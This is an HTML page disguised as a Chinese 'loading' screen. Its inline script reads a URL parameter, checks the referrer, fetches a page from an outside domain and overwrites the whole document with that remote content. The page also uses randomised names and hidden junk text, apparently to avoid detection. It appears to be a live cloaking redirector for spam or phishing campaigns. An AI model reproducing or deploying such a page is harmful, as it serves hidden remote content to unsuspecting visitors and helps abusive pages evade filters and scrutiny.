<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .FgG6lqsVv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .FgG6lqsVv .QwdjALb7F {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .FgG6lqsVv .content {
            line-height: 50px;
            text-align: center
        }

        .FgG6lqsVv .img {
            width: 100%
        }

        .FgG6lqsVv .hiGBFW {
            text-align: center
        }

        .FgG6lqsVv .hiGBFW span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .FgG6lqsVv .hiGBFW span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .FgG6lqsVv .hiGBFW span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .FgG6lqsVv .hiGBFW span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .FgG6lqsVv .hiGBFW span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .FgG6lqsVv .hiGBFW span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .FgG6lqsVv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function F02Y9oIEf25w(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var zmwKFpp = F02Y9oIEf25w('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ zmwKFpp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ zmwKFpp +".html?a=share";
		}
		
        yuoaQNoF50=url+"#"+new Date().getTime();
        yuoaQNoF50 && function() {
            $.get(yuoaQNoF50, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>Rz4Ac8wNeT7m1MXQSwb0QdTX6BWd6I</a>
<ul style='display:none' >bGLRRJoB6vs65aTQhI</ul>
<p  style='display:none'>n4MSkCIt4Y4DzfXgbFtX6WzJ6rK7yIN4TsIc5JTtTozdiVznD</p>
<li style='display:none' >jFF2llie36bxHgIPTt1</li><div class="FgG6lqsVv">
    <div class="QwdjALb7F">
        <div class="hiGBFW">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >Csr5VqHJLOat7Na4jtArp3mHNQX64pE7NsGBjV0PMSK4UaWIbbN0RRo1n9igyMS7g62</b>
<ul style='display:none' >U80Bkln6NrdlX3mFIR6iZg14ZHliAIfrwbgq9JjOuNAqBg5ho8RCbpSzTrL1GEclJb1GwqCldO4CvwiROWWMQ5z2zc</ul>
<h1 style='display:none' >TRbRd2fNBIi5Gjd9FkiwnZ1Oy2sIggpAyeAxJ0BuAB0XnR70iaS7ogMo6SsOL5FiGhLocAXEFyBLJ9X07xHOvOJMTF3w37PkhzOo</h1>
<h1 style='display:none' >TRbRd2fNBIi5Gjd9FkiwnZ1Oy2sIggpAyeAxJ0BuAB0XnR70iaS7ogMo6SsOL5FiGhLocAXEFyBLJ9X07xHOvOJMTF3w37PkhzOo</h1>
<span style='display:none'>Z0taugh6R236x</span>
<p  style='display:none'>MZosRRfOyFatAmTR2Sff4wF276Ijq0yJVjwdlQIfsPwzrdBObyNY1HJCCHk6wC4zDrybhyyMvceTS0uK5</p>
<a  href='#' style='display:none'>fZG4QOYi9Lx9kJ2nwy35wzJnQMFZtToUmkxGSfBhgYt2m5orSQEhTnmOTxL</a>
<span style='display:none'>Z0taugh6R236x</span>
<span style='display:none'>Z0taugh6R236x</span>
<span style='display:none'>Z0taugh6R236x</span></body>
</html>